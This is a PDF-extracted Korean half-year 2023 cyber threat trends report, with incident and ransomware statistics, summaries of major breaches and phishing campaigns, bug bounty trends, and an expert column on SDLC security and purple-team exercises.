Professional Documents
Culture Documents
2023년 상반기 사이버 위협 동향 보고서
2023년 상반기 사이버 위협 동향 보고서
사이버
위협 동향
보고서
2023년 상반기
사이버
위협 동향
보고서
Part. 1 Trend
사이버 해사고 현황 04
1-1. 침
위협 동향 싱사이트 위협 동향 10
1-2. 피
안 취약점 및 신고포상제 동향 13
1-3. 보
요 공격 기법의 변화 16
1-4. 주
Part. 2 Insights
Part. 3 Techniques
기술 3-1. K
ISA 침해사고분석단 종합분석팀 _ 김동욱 선임, 이태우 선임, 이슬기 선임 :
보고서 TTPs $ ScarCruft Tracking Note 68
3-2. K
ISA 침해사고분석단 사고분석팀 _ 신우성 선임,
플레인비트 _ 이예나 선임, 이상아 연구원, 한택승 연구원 :
블랙캣 랜섬웨어 침해사고 기술보고서 82
2023년 상반기
사이버 위협 동향
보고서
Part. 1
1-2. 피
싱사이트 위협 동향
1-3. 보
안취약점 및 신고포상제 동향
1-4. 주
요 공격 기법의 변화
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
Part. 1
1-1 침해사고 현황
침해사고 신고 통계
[단위 : 건수]
표 1-1 침해사고 신고 현황
4
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
유형별 침해사고 신고 통계
SK쉴더스에서 발표한 2023 상반기 보안 트렌드 보고서의 유형별 침해사고 발생 통계를 살펴보면 정보유출 30%,
악성코드 28%, 피싱/스캠 18%로 나타났다. 과학기술정보통신부(한국인터넷진흥원)의 경우에는 국내 민간분야의
침해사고 신고를 받고 있으며, 2023 상반기 기준으로 DDoS 공격 18.7%, 악성코드 23.5%, 서버 해킹 48.2%로
신고되었다.
2022년 유형별 침해사고 신고 통계를 살펴보면 서버해킹이 전년대비 3.5배로 급격히 증가하였으며, 전체 유형별
비중도 51.2%로 가장 높았다. 그 다음으로 악성코드 감염이 30.4%, DDoS 공격이 10.7%, 기타 7.7%로 나타났다.
2023년 상반기 유형별 침해사고 건수는 DDoS공격이 124건으로 전년 상반기 대비 2.5배로 가장 많이 증가하였으며,
2022년부터 2023년까지 반기별 침해사고 신고 현황을 살펴보면 서버해킹이 2022년 상반기 275건/ 하반기 310건,
2023년 상반기 320건으로 가장 많은 신고를 받은 것으로 나타났다. 그 다음으로는 악성코드 감염 신고가 2022년
상반기 125건/ 하반기 222건, 2023년 상반기 156건으로 많았으며, 다음으로 DDoS 공격 신고가 2022년 상반기
48건/ 하반기 74건, 2023년 상반기 124건 이었다. 유형별 침해사고 기타 분류에는 정보유출, 스팸 문자 및 메일
발송 등의 침해사고 신고 건이 포함되어 있으며, 2022년 상반기 25건/ 하반기 63건, 2023년 상반기에는 64건의
신고를 받은 것으로 나타났다.
[단위 : 건수]
5
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
침해사고 신고 유형 중 악성코드 감염 통계를 살펴보면 악성코드 감염 90% 이상의 비중을 랜섬웨어 신고가
차지하고 있었으며, 2022년 랜섬웨어 신고는 325건으로 지난 4년간 8.3배로 급속히 증가하였다. 2023년 상반기
랜섬웨어 침해사고 현황을 살펴보면 전년 상반기 대비 14% 증가한 134건인 것으로 나타났으며, 중견기업이
전년대비 3배 증가한 17건, 중소기업도 12% 증가한 110건인 것으로 나타났다.
랜섬웨어 침해사고 신고 기관(업)의 백업 여부 현황을 살펴보면 전체 백업률은 2022년 상반기 44.1%/ 하반기
40.1%, 2023년 상반기 47%이지만 그 중 2022년 상반기 23.1%/ 하반기 20.5%, 2023년 상반기 42.9%가 백업까지
감염된 것으로 파악되었다.
업종별 침해사고 신고 통계
2022년 업종별 침해사고 신고 통계를 살펴보면 정보통신업이 409건으로 전년대비 79% 증가 하였으며, 제조업이
245건으로 전년대비 55% 증가하여 가장 많은 사고가 발생한 것으로 나타났다. 또한 도매 및 소매업이 156건으로
전년대비 66% 증가하였고, 협회 및 단체 등 또한 70건으로 전년대비 160% 증가한 것으로 그 뒤를 이었다.
2023년 상반기 업종별 침해사고 신고 통계현황을 살펴보면 제조업이 130건으로 전년 상반기 대비 62.5%로 가장
많이 증가한 것으로 나타났으며, 정보통신업에서 가장 많은 침해사고 신고를 받은 것으로 나타났다. 2022년부터
2023년까지 반기별 침해사고 신고 현황을 살펴보면 정보통신업에서 2022년 상반기 201건/ 하반기 208건, 2023년
상반기 250건으로 가장 많은 신고를 받은 것으로 나타났으며, 제조업이 2022년 상반기 80건/ 하반기 165건,
2023년 상반기 130건으로 그 다음으로 많았다. 도매 및 소매업이 2022년 상반기 60건/ 하반기 96건, 2023년
상반기 95건이었으며, 협회 및 단체 등이 2022년 상반기 30건/ 하반기 40건, 2023년 상반기 39건인 것으로
나타났다.
[단위 : 건수]
6
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
월별 주요사고 리뷰
보안정비 제조사
공급망공격
가상통화거래소 온라인 서점 (6월)
가상자산유출 전자책 유출
(4월) (5월)
랜섬웨어 22 21 31 16 21 23
신고건수
1월 2월 3월 4월 5월 6월
샤오치잉 금융보안모듈
홈페이지 변조 취약점 악용
(1~2월) (6월)
통신사 통신사 거래 플랫폼 금융보안모듈 의약 제조사 의약 제조사
개인정보유출 라우터 대상 개인정보유출 취약점 악용 내부자료유출 개인정보유출
(1월) 디도스(1~2월) (2월) (3월) (4월) (6월)
1월 샤오치잉1) 해커조직은 대한민국을 겨냥하는 도발적인 메시지와 함께 해킹을 예고했다. 2월까지 이어진
공격으로 연구소, 학회 웹사이트 등의 메인 홈페이지가 변경되고 텔레그램에서 개인정보를 유포하는 등의 피해를
입혔다. 샤오치잉 조직은 국내 웹사이트를 대상으로 취약점 스캔을 수행해서 공격 대상들을 선별했던 것으로
확인된다. 특히 인터넷에서 쉽게 확보할 수 있는 해킹 툴인 Sqlmap과 Nuclei등을 사용했다. 피해 웹사이트들은
대부분 별다른 보안조치 없이 구축·운영되고 있는 편이었다. SQL Injection 공격을 통해 DB에 저장되어 있는
웹 관리자 계정정보가 탈취되었거나, 개발환경과 웹서버 동기화를 위해 계정정보를 담고 있는 파일(sftp.json)이
관리자의 실수로 인해 웹서버에 업로드 되어 있어 공격자가 이를 찾아 접속한 경우도 있었다. 다른 피해기업
3곳은 오래된 버전의 WebLogic(Oracle에서 배포하는 WAS)을 이용 중이었다. 설치된 버전은 공개된 지 10년 이상
지났으며 보안업데이트를 적용한 적이 없는 것으로 확인되었다.
7
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
1월 29일과 2월4일에는 이동통신사의 유선 인터넷망, IPTV 등이 5회의 DDoS 공격으로 인해 약 120분간 서비스
불가나 지연이 발생했다. 공격자는 포트 스캔을 통해 통신사의 라우터 장비를 특정하고, 노출된 포트를 대상으로
공격을 시도하여 대규모 장애를 유발했다. 해당 이동통신사는 타 통신사보다 주요 네트워크 정보(장비IP, 포트 등)가
외부에 많이 노출되어 있어서 이를 악용한 공격이 가능했다. 그리고 각 구간에 침입 탐지·차단 보안장비(IPS 등)이
부재하여 비정상 유해 패킷이 유입되었다.
3월과 6월에는 보안 솔루션의 보안패치가 없는(제로데이) 새로운 취약점 공격기법을 통한 국가배후 해킹조직의
공격이 발표되었다. 공격에 악용된 프로그램들은 인터넷뱅킹과 공동인증서 활용 시 본인인증을 위해 사용되기
때문에 국내외의 많은 PC에 설치되어 있었다. 공격자는 피해기관을 타게팅 해 언론사를 통한 워터링홀 공격2)으로
국가·공공기관 및 방산, 기업 등 국내외 주요기관 수십여 곳의 PC를 해킹한 것으로 알려졌다. 해당 취약점들은
3월에 보안패치가 개발되어 배포되었으므로 보호나라를 참고하여 필수적으로 업데이트를 설치해야 한다.
랜섬웨어 공격은 상시 발생하지만 3월에 상대적으로 많은 피해가 있었다. 특히 여러 지역에 공장이 분산되어 있어
관리가 어렵고, 자동화를 위한 시스템은 많지만 전문 보안인력 및 장비가 부족한 제조업체의 피해가 컸다. 침해사고
분석 결과에서도 공격자가 기업 네트워크에 침투하면 백업 시스템을 최우선으로 찾아 파괴하는 것을 확인할 수
있었다. 이는 피해기업과의 협상력을 높이기 위한 공격자의 전략이라고 할 수 있겠다. 이에 대응하기 위해서는
백업을 별도의 네트워크에서 운영하거나 중요 자료는 오프라인 백업을 진행해야 한다. 그리고 최근의 공격은 파일의
암호화 뿐 아니라 내부 파일들을 외부로 유출하였다가 다크웹에서 판매하거나 공개하겠다고 협박하여 이중으로
피해를 입히는 형태를 보이고 있다.
이와 유사한 흐름으로 기업의 정보유출형 공격도 변화하고 있다. 이전에는 기업의 정보를 유출 후 은밀하게
판매하거나 다른 목적(정치적, 산업기밀 탈취, 추가 공격 등)으로 악용하는 형태의 공격이 주였다면, 최근에는 탈취한
정보를 SNS에 공개하는 과시형이나 금전을 요구하는 협박형 공격이 잇따르고 있다. 이런 방식은 기업 기밀 유출로
인한 경쟁력 상실 뿐 아니라 피해 사실이 공표되어 기업 평판 및 신뢰도가 하락하는 심각한 피해를 줄 수 있다.
4월에는 가상자산거래소가 해킹 당하여 약 204억 규모의 자산이 유출되어 크게 이슈가 되었다. 거래소에 대한
보안강화 활동 및 가상자산의 가치 하락 이후 한동안 잠잠하던 거래소 대상 대규모 공격이었다. 피해기업은
고객들의 투자금에 대해 전액 보상을 발표했지만, 가상자산은 익명성 때문에 범죄자들에게 매력적인 먹잇감이기에
향후에도 투자자 보호를 위한 보안 강화에 만전을 기해야겠다.
상반기에는 불특정 다수를 대상으로 하는 피싱 공격도 지속되었다. 간편 로그인이 보편화되면서 보안이 허술한
중소규모의 사이트를 해킹한 후 포털사의 간편 로그인 페이지와 유사한 피싱 페이지를 삽입해 둔다. 방문자가 의심
없이 포털사의 계정을 입력하면 이 값이 그대로 공격자에게 전송된다. 탈취된 계정정보는 해커의 다음 공격을 위한
‘비밀번호 사전(dictionary)’으로 축적되거나 다크웹에서 팔리게 된다. 특히 여러 사이트에서 동일한 비밀번호를
사용하고 있는 사용자라면 크리덴셜 스터핑3) 공격으로 추가 피해가 발생할 수 있다.
2) 공격 대상이 방문할 것으로 추정되는 특정 웹사이트를 해킹 후 취약점 공격 코드를 삽입하고 피해자의 접속을 기다리는 기법. 취약한
버전의 프로그램이 설치된 사용자가 접속 시 악성코드에 감염됨
3) 공격자가 여러 방법으로 기존에 획득한 계정 정보를 이용하여 다른 사이트에 로그인을 시도하는 공격
8
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
포털사 사칭 이외에도 중소형 쇼핑몰을 해킹한 후 결제 단계에 정상 신용카드 결제 페이지와 비슷한 피싱 페이지를
삽입하여 신용카드 정보를 탈취하는 유형도 계속 신고 되고 있다. 사용자는 실제 구매 과정의 일부로 느낄 수 있기
때문에 금전 피해가 발생하기 쉽다.
6월에는 국내 굴지의 보안장비 회사의 업데이트 서버를 통한 공급망 공격이 확인되어 충격을 주었다. 실제로 공급망
공격은 경계보안이 철저한 기업의 내부를 침투하기 위한 수단으로 사용되어 왔다. 특히 보안장비의 경우는 기업
보안담당자들이 이를 신뢰하고 별도의 주의를 기울이지 않는 경향도 있어 악용될 경우 피해가 클 수 있다. 이 사례를
통해 보안장비를 포함한 기업 내 연결된 모든 시스템들에 대해 ‘제로트러스트’ 모델을 도입하여, 내부 네트워크에서
횡이동(Lateral movement)을 차단하고 시스템 간의 연결을 감시하여 피해를 최소화해야 할 필요성이 강하게
제기되었다.
9
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
Part. 1
1-2 피싱사이트 위협 동향
텔레그램 사칭 피싱사이트 위협 현황
텔레그램(Telegram)은 보안에 중점을 둔 메신저 앱으로, 스마트폰, 컴퓨터, 태블릿 등 모든 기기에서 간편하게
사용할 수 있고, 작년 데이터센터 화재로 인한 국내 메신저의 장애 이후 사용자수도 급증한 것으로 나타났다. 한편,
스마트폰과 메시지 앱이 편리함을 제공하는 동시에 신분증명 용도와 클라우드 연동 등 여러 기능을 통합하면서
해커들의 모바일 해킹 위협도 강력해지고 있다.
국내에서는 주로 포털사이트 계정을 탈취하기 위한 피싱공격이 발생하고 있으나 `23년 7월 초부터 국내 텔레그램
사용자 계정을 노린 피싱 공격도 다수 탐지되고 있다. 최근 텔레그램 피싱공격은 1차 계정 탈취 후 등록된 연락처의
지인들에게 ‘계정 재인증 필요’, ‘최신버전 업그레이드’와 같은 메시지를 추가 발송하여 지인을 대상으로 2차 계정
탈취 공격까지 수행한다. 특히, 텔레그램 로그인 피싱사이트는 육안으로 판단할 수 없을 만큼 구별이 어렵다.
10
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
11
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
텔레그램 사칭 피싱사이트 분석 결과
이와 같이 안드로이드 및 아이폰 기기와 상관없이 모바일 해킹에 당할 수 있기 때문에 사용자는 기본적으로 개인용
컴퓨터와 스마트폰 보안을 강화하기 위해 메신저 앱 접속 시 2차 인증설정(텔레그램 → 일반설정 → 개인 정보 및
보안), 지인이 보낸 메시지라도 출처가 불분명한 사이트 접속은 자제하는 주의가 필요하다. 만일, 피싱 메시지를
수신했다면 절대로 접속하거나 사용자 정보를 입력해서는 안 된다.
12
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
Part. 1
보안 취약점 및
1-3 신고포상제 동향
< ’22上, ’23.上 취약점 신고건수 > < ’23.上 어플리케이션 종류별 신고비율>
그림 3-1 취약점 신고 포상 관련 통계
`22~`23년 상반기까지 보안취약점 신고포상제에서 신고된 취약점 중 포상된 건수를 기준으로 통계를 산출하였다.
취약점 대상별로 작년과 올해를 비교분석한 결과 Application 취약점이 2배 이상 증가하고 상대적으로 IoT 취약점이
감소했음을 알 수 있다.
13
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
보안 프로그램 분야에는 백신 이외에 주로 문서보안 솔루션(문서 DRM, Digital Rights Management)에서 취약점이
발견되었다. 팬데믹 이후에도 재택/원격근무가 활성화되면서 대부분 기업에서 문서보안 솔루션을 필수로 사용한다.
그에 따라 분석 수요가 집중되는 반면 취약점 발굴 난이도를 봤을 때 보안성은 상대적으로 떨어지는 편이다.
다음으로 공격유형의 전반적인 변화의 흐름을 살펴보기 위해 최근 3년간과 그 이전 데이터를 비교하였다. 이전과
달리 SQL Injection 취약점이 증가하였고 취약한 인증 및 세션관리, 부적절한 권한 검증 취약점 유형이 상위로 올라간
것을 확인할 수 있다.
< `18년~`20년 3년간 공격 유형별 통계 > < `20년~`23년 상반기 공격 유형별 통계 >
마지막으로 SQL Injection 공격 유형에 해당하는 취약점 대상 중에서 CMS(웹빌더 소프트웨어)가 80% 이상을
차지하고 있다. 또한 최근 3년 동안 CMS 제조사가 다양화(5개→13개)됐다. 대표적인 CMS(그누보드 등)에서 보안
패치를 업데이트하기 전 초기 코드를 커스터마이징하여 판매하거나 보안성을 고려하지 않은 CMS가 다양하게
신고되면서 증가하고 있음을 확인했다. CMS의 경우 주로 웹쇼핑몰에 자주 사용되므로 이에 대한 각별한 주의가
필요함을 시사한다.
14
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
국내 침해사고 주요 취약점 사례
국외에서는 3월, MS는 CVE-2023-23397 아웃룩 취약점 패치를 공개했으며 메일을 열지 않아도 감염되는
취약점임을 알렸다. 해당 취약점은 사용자가 아웃룩만 실행시켜도 취약한 알람 기능을 통해 사용자의 계정
정보를 노출할 수 있는 취약점으로 CVSS 9.8점을 받았다. CERT-UA(Computer Emergency Response Team
for Ukraine)에서는 러시아 APT28 해킹 그룹이 2022년 4월부터 12월까지 우크라이나, 터키 등을 대상으로 해당
취약점을 악용하여 피싱 이메일(‘윈도우 업데이트 안내’ 등으로 위장)을 유포하였다고 밝혔다.
상반기 국내외 침해사고에 악용됐던 취약점을 살펴보면 불특정 다수 국민들이 사용하는 금융보안 프로그램, 이메일
프로그램 등이 주로 타겟이 되었으며, 이전에 사용하고 현재 사용하고 있지 않은 모듈 또는 다른 OS 호환성을 위해
남겨둔 모듈, 오래된 오픈소스 사용, API 사용자 인증 부분이 주로 미흡하여 사고가 발생했음을 알 수 있다. 이를
예방하기 위해서는 무엇보다 각 기업의 제품, 서버에서 사용하는 각각의 모듈 정보 및 버전을 현행화하여 관리해야 한다.
15
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
Part. 1
1-4 주요 공격 기법의 변화
29% Backdoor
34%
Downloader
Dropper
Ransomware
Launcher
5% Other
7%
14%
11%
16
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
2022년에 발생한 주요 침해사고를 되돌아보면 다기능 백도어를 통한 정보 유출과 랜섬웨어 사고를 뽑을 수 있다.
정보유출 사고는 개인 PC가 감염되면, 공격 대상뿐 아니라 공격 대상의 주변인 정보까지 유출 될 수 있으며, 이
정보를 바탕으로 피해자를 사칭해 주변인에게까지 악성 메일을 발송하는 등 추가적인 피해를 야기할 수 있다.
또한, 귀신 랜섬웨어의 등장은 기존과 달리 피해 기업의 비즈니스 이해도가 월등히 높고, 국내에서 널리 이용되고
있는 솔루션의 활용이 능숙한 차별성이 존재한다. 또한, 국내 수사기관을 열거하는 행위와 국내에서 사용하는
인증제도(ISMS-P)를 언급하는 등 공격자는 한국 보안시장에 대해 지식을 보유하고 있다.
이러한 수많은 침해사고를 장시간 분석하다 보면 공격자들이 선호하는 기법들이 자연스레 보이기 마련이다. 그 중
국내에서 발생한 주요 침해사고에서 공통으로 사용되는 핵심 기법은 ‘SMB/Admin Share’를 이용한 내부 전파(Lateral
Movement)이다. Windows의 SMB/Admin Share 기능은 많은 기업에서 서버 간 자료 공유의 편의성을 추구하거나,
Active Directory 환경에서의 정책 배포를 위해 사용하는 기능이다. 하지만 이 기능을 잘못 사용하였을 경우 보안상
큰 문제가 발생할 수 있다. 대부분의 침해사고 대응은 랜섬웨어 감염으로 파일이 암호화되거나, 정보가 유출되어
해커로부터 협박을 당하는 등 Impact 단계에서 침해사고를 인지한 후 비로소 시작된다. 하지만, 방어자가 침해
사실을 인지할 수 없도록 공격자가 감염 상태만 지속 유지한다면, 공격자는 오랫동안 기업 내부에 잠복할 수 있으며,
내부 정보를 지속적으로 탈취할 수도 있다.
17
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
올해에도 북한의 해킹그룹이 다양한 사이버 공격을 이어가고 있다고 해도 과언이 아니다. 이들은 정부기관, 방산
업체, 금융기관 등 주요 인프라나 기업을 대상으로 일주일에 한 번 꼴로 공격을 감행하고 있다. 주요 목적은 정보
탈취나 외화벌이 이고 공격 기법은 주로 피싱이다. 북한 입장에서는 피싱 공격으로 해도 충분히 성과를 거두고
있는데 공격 기법을 바꿀 필요가 없다.
레코디드 퓨처 연구팀인 ‘인식트 그룹(Insikt Group)’이 2023년 6월에 ‘북한의 사이버 전략’ 보고서를 발표했다.
이 보고서는 2009년 7월부터 2023년 5월 사이 북한 연계 해킹 조직의 소행으로 정부와 관련 업체 등에 의해
공개적으로 지목된 사이버 공격 273건을 분석한 결과가 담겨있다. 지금까지 공격 활동이 가장 많이 보고된 북한
해킹 조직은 ‘김수키’로 전체의 37%를 차지하고, 이어 ‘라자루스’, ‘APT37’ 등이 뒤를 이었다고 말한다. 또한, 북한의
일상적인 사이버 활동은 정부의 의사 결정이나 국가안보 관련 군사 지원하는 정보 수집 등 전통적인 첩보 활동에
더욱 집중하는 경향이 있다고 분석했다. 북한 해킹 조직 가운데 가장 활발한 활동을 보이는 ‘김수키’는 아시아
특히 한국에서 주로 정부와 비정부 기구를 대상으로 사이버 공격을 벌이고, ‘라자루스’는 다양한 표적을 대상으로
활동하지만 암호화폐와 기존 금융기관에 다소 집중하는 것으로 분석했다.
2023년 상반기에는 라자루스 그룹이 제로데이 취약점을 이용하여 공격을 시도하는 정황이 새롭게 확인됐다. 해당
공격그룹은 국내 대다수의 기업과 사용자들이 사용하고 있는 보안 솔루션 및 언론 사이트를 최초 침투에 악용했다.
공격자는 주로 언론사의 기사 페이지에 악성 스크립트를 삽입해 워터링홀 페이지로 악용했으며, 해당 페이지에 접속 시
보안 소프트웨어 취약점을 통해 악성코드를 설치하는 전략을 사용했다. 이 과정에서 공격자는 보안 솔루션 개발업체의
소스코드를 탈취하여 취약점 코드를 개발한 것으로 드러났다. 공격자는 워터링홀 공격을 위해 언론사 사이트를
이용하고, 명령제어지 구축을 위해 호스팅 업체를 악용하는 등 국내 인프라를 이용한 공격 범위 확장을 지속하고 있다.
18
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
그림 4-3 과거 탈취한 소스코드 악용을 통한 소프트웨어 개발사 공격 (KISA, TTP#10 Operation GoldGoblin)
라자루스 그룹은 보안 소프트웨어 개발사의 소스코드를 탈취한 전적이 있으며, 해당 보안 소프트웨어의 제로데이
취약점을 악용한 공격이 이번 오퍼레이션으로 드러났다. 공격자는 탈취한 소스코드를 분석하여 취약점을 공격하는
코드를 제작하고 연이어 다른 개발사를 공격하는 등 추가적인 공격도구를 준비하는 모습을 보인다.
그림 4-4 최초 침투된 언론사 홈페이지에서 출발한 연이은 홈페이지 감염 (KISA, TTP#10 Operation GoldGoblin)
취약점을 악용하는 워터링홀 공격에는 특정 언론사 홈페이지가 악용되었다. 일반적으로 언론사들은 타 언론사의
단독 보도 확인 등을 위하여 홈페이지를 모니터링하기도 한다. 따라서, 하나의 언론사가 감염되었을 경우
모니터링하는 언론사도 사고가 전이되는 등 감염이 연쇄적으로 확산될 수 있다.
우리는 일상생활 중 항상 언론기사를 접하며 살아가고 있으며 특정 현안에 대한 기사를 주변 사람들과 공유하기도
한다. 이러한 과정에서 워터링홀로 악용되는 언론사의 기사가 공유될 경우 보안 소프트웨어의 취약점이 발현되어
피해가 확산될 수 있다. 또한, 악용된 보안 소프트웨어는 인터넷 뱅킹과 같은 중요 서비스 사용 시 필수적으로
설치되는 소프트웨어이며, 약 20%의 시장점유율을 가진 것으로 알려져 있다. 이를 대응하는 과정에서 해당 취약점이
선제적으로 조치되지 않았다면 수백만명이 위협에 노출되었을 것이다.
19
2023년 상반기 사이버 위협 동향 보고서 Trend
국내외 사이버 위협 동향
결론 및 시사점
공격자의 공격 기법이나 도구는 언제나 방어 환경의 특성과 맞물려 있다. 공격의 흐름과 과정을 패턴이나 기법이
아닌 전략 전술 관점으로 보아야 하며 더욱 적극적인 보안 대책이 필요하다. 또한, 제로데이 취약점을 최소화하기
위해 개발 환경에서 보안 취약점을 발생하지 않도록 환경 조성이 필요하며, 취약점 발견 시 신속한 대응 또한 매우
중요하므로 공격을 바로 확인할 수 있는 가시성 확보가 중요하다.
20
2023년 상반기
사이버 위협 동향
보고서
Part. 2
Insights┃ 전문가 컬럼
2-1. 쿠팡 Blueteam 곽성현 Staff Security Engineer :
맞춤형 공격 대응을 위한 기업 내 보안조직 운영 방안
2-2. 한국랜섬웨어침해대응센터 이경호 과장 :
랜섬웨어 공격 구조와 취약점 패치의 중요성
2-3. 고려대학교 SW보안연구소 최윤성 교수 :
3CX 연쇄 소프트웨어 공급망 공격 사건과 시사점
2-4. 한국전자통신연구원 사이버보안연구본부 김익균 :
사이버 억지력 강화를 위한 「Defend Forward」
전략의 이해
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
Part. 2
SDLC는 왕이다
OWASP에서는 SDLC(Software Development Life Cycle)는 왕으로 표현하고 있다.1) 그만큼 보안에서 SDLC를
중요하게 생각한다. 조직 내에서 이미 수행 중인 보안 활동을 SDLC의 각 단계에 통합함으로써 어플리케이션 보안에
대한 전체적인 접근이 가능하다. 각 조직에서 사용하는 SDLC 모델에 따라 다양한 단계의 이름을 사용할 수 있지만
개념적인 단계는 아래와 같다.
1) https://owasp.org/www-project-web-security-testing-guide/stable/2-Introduction/README#The-OWASP-Testing-Project
22
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
지속적인 개발 사이클과 쉽게 줄어들지 않는 취약점 리스크를 감안하면 보안 조직에서는 전략적인 접근이 필요하다.
테스트 대상을 명확하게 정의하고 사전 교육, 빈도 높은 테스트, 테스트 자동화를 통해 목표를 달성할 수 있다.
테스트의 대상과 내용은 아래와 같다.
프로세스(Process): 적절한 보안 정책과 표준이 있고, 사람들이 해당 정책을 따르는 방법을 알고 있는지
확인한다.
사전 교육을 통해 SDLC 초기에 버그를 감지한다면 더 빠르고 저렴한 비용으로 문제를 해결할 수 있다. 보안 버그는
기능이나 성능 기반 버그와 다르지 않기 때문에 개발 및 QA팀을 대상으로 발생 가능한 일반적인 보안 문제와
이를 감지하는 방법에 대해 교육하면 된다. 또한, 보안 테스트 교육은 개발자가 공격자의 관점에서 애플리케이션을
테스트하기 위한 적절한 사고 방식을 습득하는데 도움이 되며 보안 문제를 보안팀의 이슈가 아닌 개발관련 모든
조직의 이슈로 고려할 수 있게 한다.
23
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
보안 조직의 입장에서 SDLC에 적절한 보안 활동을 통합시키는 것은 쉽지 않다. 비지니스 우선 순위와 개발 일정을
모두 고려하기 때문이다. 꾸준한 논의와 비니지스 정당성, 리스크 임팩트에 대한 설명 등 지속적인 커뮤니케이션을
통해 발전시켜 나가야 한다. 하지만 통합을 이뤘다고 리스크를 완벽하게 완화시켰다고 확신할 수 없다. 이때 우리는
보안 보증 성숙도 모델(SAMM; Security Assurance Maturity Model)을 통해 현재의 성숙도를 파악하고 보다 높은
성숙도를 갖기 위한 로드맵을 찾을 수 있다.
OWASP SAMM2)
SAMM은 Security Assurance Maturity Model의 약자로 모든 유형의 조직이 소프트웨어의 보안 상태를 분석하고
개선할 수 있도록 측정 가능한 방법을 제공하는 성숙도 모델이다. SAMM의 상위 레벨에서는 5가지의 비지니스
기능을 정의한다. 각 비지니스는 소프트웨어 개발과 관련된 모든 조직의 활동 범주이다.
그림 1-3 SAMM 모델 개요
2) https://www.opensamm.org/
24
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
그림 1-4 SAMM 구조
보안 활동은 논리적으로 그룹화된 두 개의 스트림이 있다. 스트림은 보안 활동의 다양한 측면을 다루며 각 성숙도
수준에 걸쳐 보안 활동을 조정하고 연결하는 목표를 갖고 있다.
25
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
조직의 현재 소프트웨어 보안 태세 평가
조직의 목표 정의
퍼플팀(Purple Team)
SAMM의 비지니스 기능 중 Verification은 레드팀의, Operations는 블루팀의 역할로 볼 수 있다. Verification은
아키텍처 평가, 요구 사항 기반 테스트, 보안 테스트로 보안 활동이 구성된다. 하지만 대부분의 조직에서는 비지니스
우선 순위와 리소스 문제로 인해 웹 서비스 기반 보안 테스트에 대한 보안 활동에 중점을 둔다.
쿠팡에서는 퍼플팀으로 이 문제를 해결하고 있다. 퍼플팀을 통해 레드팀의 테스트 영역의 한계를 조금씩 넓히고
블루팀의 탐지 범위를 확장한다. 정보 보안 조직의 리더들을 포함해 블루팀과 레드팀에서 가상의 퍼플팀을 구성한다.
퍼플팀 활동을 수행함으로써 참가자들은 공동으로 공격과 탐지, 대응을 하고 정보 보안 평가에 대한 전체 지식을
공유하게 된다.
26
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
직책 역할 책임
27
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
퍼플팀 프레임워크 구성
퍼플팀 프레임워크는 5 단계로 구성되며 각 단계는 아래 순서대로 수행한다. 전 단계를 수행하는 기간은 최소 한달이
소요되며, 분기에 한 번 수행을 목표로 한다.
단계 설명
레드팀 준비 기간 제로 지식 기반 공격 페이로드 개발
블루팀 준비 기간 제로 지식 기반 헌팅 쿼리 개발
퍼플팀 연습 실행 정보 보안 평가에 대한 전체 지식 공유
위협 모델링(Threat Modeling)
위협 모델은 심각도와 데이터를 기반으로 결정된다. CTI 정보를 기반으로 조직에 위협이 되는 모델을 목록화 화여
상위 의사 결정자들과 정기적인 회의를 갖는다. 회의에서는 심각도를 평가하고 비지니스에 따른 위협 모델의 우선
순위를 결정한다. 위협 모델이 결정되면 CTI 정보를 기반으로 위협 프로파일링 작업을 진행한다. 위협 모델의 대상은
외부 위협 뿐만 아니라 내부 위협도 포함한다.
그림 1-6 위협 모델 범위
기존의 사이버 위협 모델링 방식에서는 MITRE Attack Matrix3)를 이용한다. 해당 매트릭스는 지속적인 업데이트와
다양한 플랫폼을 포함하고 있어 일반적인 기업에서 사용하기에 훌륭하다. 하지만 특정 산업에만 존재하는 TTP의
경우 모델링하기 어렵기 때문에 쿠팡은 MITRE Attack Matrix를 포함하는 별도의 매트릭스를 개발해 운영하고 있다.
3) https://attack.mitre.org/matrices/enterprise/
28
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
MITRE Attack Matrix를 이용해 위협 모델링 및 퍼플팀 활동을 준비한다면 VECTR4)와 CALDERA5)와 같은 플랫폼을
이용할 수 있다. 오픈소스 플랫폼으로써 모든 공격을 대상으로 모델링을 할 수 있으며, 에이전트를 이용한다면 공격
에뮬레이션과 자동 로그 수집을 할 수 있다.
그림 1-8 벡터 프로파일링 예시
4) https://vectr.io/
5) https://caldera.mitre.org/
29
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
그림 1-9 프로파일링 사용 사례
수행 결과 피드백(Lessons Learned)
퍼플팀 연습 수행이 끝나면 수행 결과를 피드백한다. 결과 보고서를 작성하고 퍼플팀 활동 중 발견된 액션
아이템들을 처리한다. 또, 레드팀 페이로드를 공유하고 탐지 룰에 대한 성능 개선을 한다.
30
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
퍼플팀 보고서
